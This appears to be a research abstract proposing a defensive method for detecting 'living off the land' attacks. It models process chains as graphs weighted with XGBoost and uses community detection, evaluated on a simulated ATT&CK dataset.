In a large-scale network, the security threats faced by the host are becoming increasingly diverse. With the rapid rise of technology based on machine learning to detect malicious files, the ability to detect malware has been greatly improved, and it has also forced adversaries to change their attack strategies. Among them, the “Living off the land” strategy achieves malicious behavior by calling operating system tools or automated management programs that perform tasks. Threat detection can find suspicious behavior in the context of parent and child processes. The parent-child process chain and the related events derived from it are regarded as an undirected graph, and the supervised learning XGBoost algorithm is used for weight distribution to generate an undirected weighted graph. Finally, a community discovery algorithm is employed to identify larger attack sequences from the graph. The above algorithm is verified on the simulated attack dataset of MIRTE ATT & CK.